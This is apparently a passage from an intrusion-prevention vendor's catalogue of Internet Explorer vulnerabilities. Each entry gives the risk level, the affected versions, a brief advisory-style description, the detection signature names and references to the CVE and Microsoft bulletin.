Microsoft-Internet-Explorer-HTML-Object-Memory-Corruption-CVE-2010-3343

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-362-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-HTML-Object-Memory-Corruption-CVE-2010-3343
File-Text_Microsoft-Internet-Explorer-HTML-Object-CVE-2010-3343

References:

CVE-2010-3343
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3343

MS10-090
http://technet.microsoft.com/security/bulletin/MS10-090

Microsoft-Internet-Explorer-HTML-Objects-Memory-Corruption-CVE-2009-1918

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-234-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 5.0; Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Microsoft Internet Explorer.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-HTML-Objects-Memory-Corruption-CVE-2009-1918
File-Text_Microsoft-Internet-Explorer-HTML-Objects-CVE-2009-1918

References:

CVE-2009-1918
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1918

BID-35826
http://www.securityfocus.com/bid/35826

MS09-034
http://technet.microsoft.com/security/bulletin/MS09-034

Microsoft-Internet-Explorer-HTML-Rendering-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-414-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer;

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to the way that Internet Explorer accesses an object that has been deleted. A remote attacker can exploit this vulnerability by enticing a target user to open a maliciously crafted HTML document. In a sophisticated attack where code injection is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code. The injected code, in this case, would execute within the security context of the currently logged in user. If such an attack is not executed successfully, the vulnerable application may terminate abnormally.

Situation:

File-Text_Microsoft-Internet-Explorer-HTML-Rendering-Memory-Corruption

References:

CVE-2010-0807
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0807

BID-39024
http://www.securityfocus.com/bid/39024

MS10-018
http://technet.microsoft.com/security/bulletin/MS10-018

Microsoft-Internet-Explorer-HTML-Rendering-Memory-Corruption-CVE-2006-3637

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-586-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0

Type:

Input Validation

Description:

A vulnerability has been reported in Microsoft Internet Explorer that can be exploited by remote attackers to execute arbitrary code on the user's machine. The vulnerability is due to improper handling of certain layout positioning which may corrupt the memory and could result in execution of arbitrary code. Attackers can exploit this vulnerability by enticing an unsuspecting user to visit a specially crafted web page that contains malicious HTML code.

Situation:

File-Text_Microsoft-Internet-Explorer-HTML-Rendering-Memory-Corruption-CVE-2006-3637

References:

CVE-2006-3637
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3637

BID-18277
http://www.securityfocus.com/bid/18277

OSVDB-27853
http://www.osvdb.org/27853

MS06-042
http://technet.microsoft.com/security/bulletin/MS06-042

Microsoft-Internet-Explorer-HTML-Sanitization-CVE-2012-1858

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-457-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 9.0; Internet Explorer 8.0; Microsoft InfoPath 2007; Microsoft InfoPath 2010; Microsoft Office SharePoint Server 2007; Microsoft Office SharePoint Server 2010; Microsoft Groove Server 2010; Microsoft SharePoint Services; Microsoft SharePoint Foundation; Microsoft Office Web Apps 2010

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-HTML-Sanitization-CVE-2012-1858

References:

CVE-2012-1858
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1858

OSVDB-82861
http://www.osvdb.org/82861

MS12-037
http://technet.microsoft.com/security/bulletin/MS12-037

MS12-039
http://technet.microsoft.com/security/bulletin/MS12-039

MS12-050
http://technet.microsoft.com/security/bulletin/MS12-050

Microsoft-Internet-Explorer-HTML-Tag-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is caused due to the application's failure to properly handle certain HTML tags. A remote attacker may exploit this issue via a malicious web page to execute arbitrary code in the context of the currently logged in user. Since code injection resulting from leveraging this vulnerability has been found to be highly unlikely, generally an attack attempt will result in the termination of the affected process. In the event where successful code injection is a result of an attack attempt, the behaviour of the target system is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the currently logged-in user.

Situation:

File-Text_Microsoft-Internet-Explorer-HTML-Tag-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-HTML-Tag-Memory-Corruption-2

References:

CVE-2006-1188
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1188

MS06-013
http://technet.microsoft.com/security/bulletin/MS06-013

Microsoft-Internet-Explorer-HTML-Time-Element-Memory-Corruption-CVE-2010-3346

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-362-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 8.0; Internet Explorer 7.0; Internet Explorer 6.0

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-HTML-Time-Element-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-HTML-Time-Element-CVE-2010-3346
File-Text_Microsoft-Internet-Explorer-HTML-Time-Element-CVE-2010-3346-2

References:

CVE-2010-3346
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3346

BID-45261
http://www.securityfocus.com/bid/45261

MS10-090
http://technet.microsoft.com/security/bulletin/MS10-090

Microsoft-Internet-Explorer-HTTP-Response-Double-Free-Memory-Corruption

About this vulnerability:

A double free vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-162-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Double Free

Description:

There is a remote code execution vulnerability in Internet Explorer. Microsoft has a proprietary extension to the HTTP protocol that allows responses with status code 449, Retry With. If such responses contain no action, Internet Explorer attempts to access a memory region that has been previously released or has not been correctly initialized. Remote unauthenticated attackers could exploit this vulnerability by persuading a target user to visit a website hosted by a web server that sends certain malicious error responses. Successful exploitation would cause a memory corruption that may lead to arbitrary code execution in the security context of the logged in user.

Situation:

HTTP_SLS-Microsoft-Internet-Explorer-HTTP-Response-Double-Free-Memory-Corruption

References:

CVE-2008-2256
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2256

BID-30611
http://www.securityfocus.com/bid/30611

MS08-045
http://technet.microsoft.com/security/bulletin/MS08-045

Microsoft-Internet-Explorer-Image-Processing-Argument-Handling-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-144-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Microsoft Internet Explorer. The vulnerability is due to the way the Internet Explorer image handling module handles certain arguments. Remote attackers can exploit this vulnerability by persuading target users to visit a specially-crafted web page. Successful exploitation may allow the attacker to execute arbitrary code on the vulnerable client system, in the context of the logged in user.

Situation:

HTTP_SS-Internet-Explorer-Image-Processing-Argument-Handling-Memory-Corruption
File-Text_Internet-Explorer-Image-Processing-Argument-Handling-Memory-Corruption

References:

CVE-2008-0078
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0078

BID-27689
http://www.securityfocus.com/bid/27689

MS08-010
http://technet.microsoft.com/security/bulletin/MS08-010

Microsoft-Internet-Explorer-Information-Disclosure-CVE-2015-2413

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-661-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0; Internet Explorer 10.0

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Information-Disclosure-CVE-2015-2413

References:

CVE-2015-2413
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2413

MS15-065
http://technet.microsoft.com/security/bulletin/MS15-065

Microsoft-Internet-Explorer-Initfromstring-Function-Out-Of-Bounds-Memory-Access

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-724-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

There exists an Out Of Bounds vulnerability in Microsoft Internet Explorer. A remote attacker can use this to acchieve this to gain sensitive information from the process memory.

Situation:

File-TextId_Microsoft-Internet-Explorer-Initfromstring-Function-Out-Of-Bounds-Memory-Access
File-Text_Microsoft-Internet-Explorer-Initfromstring-Function-Out-Of-Bounds-Memory-Access

References:

CVE-2015-6086
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6086

MS15-112
http://technet.microsoft.com/security/bulletin/MS15-112

Microsoft-Internet-Explorer-insertRow-Remote-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-457-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A remote code execution vulnerability exists in Internet Explorer. The vulnerability is due to memory corruption when specific modifications to TABLE elements occur. A remote, unauthenticated attacker can exploit this vulnerability by enticing a target user to open either an HTML document with Internet Explorer, or a Microsoft Office document with an embedded "safe for initialization" ActiveX component that hosts the IE rendering engine. A successful exploitation attempt could result in the execution of arbitrary code in the security context of the target user.

Situation:

File-Text_Microsoft-Internet-Explorer-insertRow-Remote-Code-Execution

References:

CVE-2012-1880
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1880

OSVDB-82870
http://www.osvdb.org/82870

MS12-037
http://technet.microsoft.com/security/bulletin/MS12-037

Microsoft-Internet-Explorer-Invalid-Pointer-Reference

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-275-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000; Windows XP; Windows 2003; Windows Vista; Windows 2008; Windows 7

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0

Type:

Input Validation

Description:

There is a remote code execution vulnerability in Microsoft Internet Explorer. This vulnerability is also know with alias Aurora.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-Invalid-Pointer-Reference
File-Text_Microsoft-Internet-Explorer-Invalid-Pointer-Reference

References:

CVE-2010-0249
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0249

BID-37815
http://www.securityfocus.com/bid/37815

OSVDB-61697
http://www.osvdb.org/61697

MS10-002
http://technet.microsoft.com/security/bulletin/MS10-002

Microsoft-Internet-Explorer-Invalid-Pointer-Reference-CVE-2010-0806

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-293-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0; Internet Explorer 7.0

Type:

Input Validation

Description:

A remote code execution vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to an invalid pointer being used after an object is deleted. This vulnerability may be exploited by remote attackers to execute arbitrary code on the target machine by enticing a user to open a specially crafted HTML document. In attack scenarios where code execution is successful the behaviour of the target machine would depend entirely on the intention of the injected code, and run within the security context of the logged on user. In situations where code execution is not successful, the vulnerable application may terminate abnormally, leading to a denial of service condition.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-Invalid-Pointer-Reference-CVE-2010-0806
File-Text_Microsoft-Internet-Explorer-Invalid-Pointer-Reference-CVE-2010-0806
File-Text_Microsoft-Internet-Explorer-Use-After-Free-CVE-2010-0806

References:

CVE-2010-0806
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0806

BID-38615
http://www.securityfocus.com/bid/38615

OSVDB-62810
http://www.osvdb.org/62810

MS10-018
http://technet.microsoft.com/security/bulletin/MS10-018

Microsoft-Internet-Explorer-Isindex-Memory-Corruption

About this vulnerability:

A vulnerability in Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-414-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to the way Internet Explorer handles certain layout combinations. Remote attackers can exploit this vulnerability by persuading target users to visit a specially crafted web page. Successful exploitation may allow the attacker to execute arbitrary code on the vulnerable client system, in the context of the logged in user.

Situation:

File-Text_Microsoft-Internet-Explorer-Isindex-Memory-Corruption

References:

CVE-2008-0076
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0076

BID-27668
http://www.securityfocus.com/bid/27668

MS08-010
http://technet.microsoft.com/security/bulletin/MS08-010

Microsoft-Internet-Explorer-JavaScript-Page-Update-Race-Condition

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-113-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There is a race condition vulnerability in Microsoft Internet Explorer web browser. The vulnerability is due to the way Internet Explorer handles location DOM objects. A remote attacker may exploit this vulnerability by interrupting page loading in a way that would allow spoofing of the URL address bar and page properties, including SSL certificates. This would enable remote attackers to conduct phishing attacks on the vulnerable clients.

Situation:

HTTP_Microsoft-Internet-Explorer-JavaScript-Page-Update-Race-Condition
File-Text_Microsoft-Internet-Explorer-JavaScript-Page-Update-Race-Condition

References:

CVE-2007-3091
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3091

BID-24283
http://www.securityfocus.com/bid/24283

OSVDB-54944
http://www.osvdb.org/54944

MS09-019
http://technet.microsoft.com/security/bulletin/MS09-019

Microsoft-Internet-Explorer-Jointostring-Type-Confusion

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-919-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

There exists a memory corruption vulnerability in Microsoft Internet Explorer. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Internet-Explorer-Jointostring-Type-Confusion

References:

CVE-2017-0130
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0130

MS17-006
http://technet.microsoft.com/security/bulletin/MS17-006

Microsoft-Internet-Explorer-JS-Information-Disclosure-CVE-2011-1245

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-386-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows Vista; Windows XP; Windows 2003; Windows 2008

Software:

Internet Explorer 6.0; Internet Explorer 7.0

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-JS-Information-Disclosure-CVE-2011-1245
File-Text_Microsoft-Internet-Explorer-JS-Information-Disclosure-CVE-2011-1245

References:

CVE-2011-1245
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1245

BID-47192
http://www.securityfocus.com/bid/47192

MS11-018
http://technet.microsoft.com/security/bulletin/MS11-018

Microsoft-Internet-Explorer-Jscript.dll-Regular-Expression-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-697-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Malfunction

Description:

There exists a use after free vulnerability in Microsoft Internet Explorer. A remote attacker can use this to execute arbitrary code in the security context of the target user.

Situation:

File-Text_Microsoft-Internet-Explorer-Jscript.dll-Regular-Expression-Use-After-Free

References:

CVE-2015-2482
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2482

MS15-106
http://technet.microsoft.com/security/bulletin/MS15-106

Microsoft-Internet-Explorer-Jscript9.dll-Typedarray-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-775-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0

Type:

Malfunction

Description:

There exists a Use After Free vulnerability in Microsoft Internet Explorer. A remote attacker could use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Internet-Explorer-Jscript9.dll-Typedarray-Use-After-Free

References:

CVE-2016-3210
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3210

MS16-063
http://technet.microsoft.com/security/bulletin/MS16-063

Microsoft-Internet-Explorer-Jserrortostring-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-1045-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Buffer Overflow

Description:

There has been reported a heap buffer overflow vulnerability in Microsoft Internet Explorer. This vulnerability can be exploited by having a target user open maliciously crafted web page.

Situation:

File-Text_Microsoft-Internet-Explorer-Jserrortostring-Heap-Buffer-Overflow

References:

CVE-2017-11810
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11810

Microsoft-Internet-Explorer-Layout-Grid-Char-Memory-Corruption

About this vulnerability:

Attempt to explot a vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-405-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Input Validation

Description:

A code execution vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to an input validation weakness in how the vulnerable application handles HTML pages. Remote attackers can exploit this vulnerability by enticing target users to open a malicious webpage, potentially causing arbitrary code to be injected and executed in the security context of the currently logged on user.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-Layout-Grid-Char-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Layout-Grid-Char-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Layout-Grid-Char-Memory-Corruption-2
File-Text_Microsoft-Internet-Explorer-Layout-Grid-Char-Memory-Corruption-3

References:

CVE-2011-1260
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1260

BID-48208
http://www.securityfocus.com/bid/48208

OSVDB-72950
http://www.osvdb.org/72950

MS11-050
http://technet.microsoft.com/security/bulletin/MS11-050

Microsoft-Internet-Explorer-Layout-Use-After-Free

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-480-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Layout-Use-After-Free

References:

CVE-2012-2548
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2548

BID-55646
http://www.securityfocus.com/bid/55646

MS12-063
http://technet.microsoft.com/security/bulletin/MS12-063

Microsoft-Internet-Explorer-Layouts-Handling-CVE-2011-0094

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-386-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows Vista; Windows XP; Windows 2003; Windows 2008

Software:

Internet Explorer 6.0; Internet Explorer 7.0

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-Layouts-Handling-CVE-2011-0094
File-Text_Microsoft-Internet-Explorer-Layouts-Handling-CVE-2011-0094
File-Text_Microsoft-Internet-Explorer-Layouts-Handling-CVE-2011-0094-2

References:

CVE-2011-0094
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0094

MS11-018
http://technet.microsoft.com/security/bulletin/MS11-018

Microsoft-Internet-Explorer-Link-Properties-Handling-CVE-2011-1250

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-396-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP; Windows 2003; Windows Vista; Windows 2008; Windows 7; Windows 2008 R2

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-Link-Properties-Handling-CVE-2011-1250
File-Text_Microsoft-Internet-Explorer-Link-Properties-Handling-CVE-2011-1250

References:

CVE-2011-1250
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1250

MS11-050
http://technet.microsoft.com/security/bulletin/MS11-050

Microsoft-Internet-Explorer-Location-Property-Cross-Domain-Scripting

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-379-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

There exists a vulnerability in Microsoft Internet Explorer. The vulnerability is due to an input validation error in assigning the location or location.href property of the window object. Successful exploitation can allow a remote attacker to execute arbitrary script code in a user's browser session in context of the trusted site and to access the content of a web page in a different domain.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-Location-Property-Cross-Domain-Scripting
File-Text_Microsoft-Internet-Explorer-Location-Property-Cross-Domain-Scripting

References:

CVE-2008-2947
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2947

BID-29960
http://www.securityfocus.com/bid/29960

MS08-058
http://technet.microsoft.com/security/bulletin/MS08-058

Microsoft-Internet-Explorer-Long-Url-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1406-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Buffer Overflow

Description:

A vulnerability has been reportedly introduced into certain versions of Microsoft Internet Explorer with the introduction of a security update. The vulnerability exists in the processing of compressed data used with the HTTP 1.1 protocol. An attacker could exploit this vulnerability to cause a denial of service condition or possibly inject and execute arbitrary code on a vulnerable host. Upon an unsuccessful code injection attack, the affected browser may terminate or display a warning message. The behaviour of the host system after an attack attempt resulting in arbitrary code injection and its subsequent execution is dependent on the intention of the injected code. It is likely that the vulnerable browser will stop functioning or terminate as a result.

Situation:

HTTP_CSU-Microsoft-Internet-Explorer-Long-Url-Buffer-Overflow

References:

CVE-2006-3869
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3869

BID-19667
http://www.securityfocus.com/bid/19667

OSVDB-28132
http://www.osvdb.org/28132

Microsoft-Internet-Explorer-Loop-Counter-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-528-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer; Windows Server

Type:

Malfunction

Description:

A vulnerability exists Microsoft Internet Explorer, which can allow an attacker to corrupt memory. The vulnerability is due to an error in the way Internet Explorer accesses certain objects. A remote attacker can exploit this vulnerability by enticing a user to view a specially crafted web page or embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the IE rendering engine. Successful exploitation could result in code execution in the context of the currently logged in user.

Situation:

File-Text_Microsoft-Internet-Explorer-Loop-Counter-Memory-Corruption

References:

CVE-2012-1522
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1522

OSVDB-83653
http://www.osvdb.org/83653

MS12-044
http://technet.microsoft.com/security/bulletin/MS12-044

Microsoft-Internet-Explorer-Malformed-BMP-File-Buffer-Overrun-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Buffer Overflow

Description:

A vulnerability exists in Microsoft Internet Explorer (IE), which could allow a malicious user to execute arbitrary code when a specially crafted bitmap file is loaded by IE. The behaviour of the attack target varies according to the instructions in the malicious content on victim machine. Generally, Internet Explorer will crash immediately. In the worst case, the embedded shell code will be run on the target machine in the context of the currently logged in user.

Situation:

File-Binary_Internet-Explorer-BMP-BOF

References:

CVE-2004-0566
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0566

BID-9663
http://www.securityfocus.com/bid/9663

MS04-025
http://technet.microsoft.com/security/bulletin/MS04-025

Microsoft-Internet-Explorer-Marquee-Object-Handling-Memory-Corruption

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-246-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer

Type:

Malfunction

Description:

A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to the way Internet Explorer handles Marquee objects. Remote attackers can exploit this vulnerability by enticing target users to open a crafted web page. An attack targeting this vulnerability can result in the injection and execution of arbitrary code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Any injected code will be executed within the security context of the currently logged in user. In the case of an unsuccessful code execution attack, Internet Explorer may terminate abnormally.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-Marquee-Object-Handling-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Marquee-Object-Handling-Memory-Corruption

References:

CVE-2009-0554
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0554

BID-34426
http://www.securityfocus.com/bid/34426

MS09-014
http://technet.microsoft.com/security/bulletin/MS09-014

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2009-1917

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-234-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0

Type:

Malfunction

Description:

There is a memory corruption vulnerability in Microsoft Internet Explorer.

Situation:

HTTP_SS-Microsoft-Internet-Explorer-Memory-Corruption-CVE-2009-1917
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2009-1917

References:

CVE-2009-1917
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1917

BID-35831
http://www.securityfocus.com/bid/35831

MS09-034
http://technet.microsoft.com/security/bulletin/MS09-034

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3123

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-526-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3123

References:

CVE-2013-3123
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3123

BID-60392
http://www.securityfocus.com/bid/60392

OSVDB-94117
http://www.osvdb.org/94117

MS13-047
http://technet.microsoft.com/security/bulletin/MS13-047

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3124

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-526-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 9.0

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3124

References:

CVE-2013-3124
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3124

MS13-047
http://technet.microsoft.com/security/bulletin/MS13-047

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3125

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-526-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 10.0

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3125

References:

CVE-2013-3125
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3125

MS13-047
http://technet.microsoft.com/security/bulletin/MS13-047

Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3139

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-526-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 8.0

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3139

References:

CVE-2013-3139
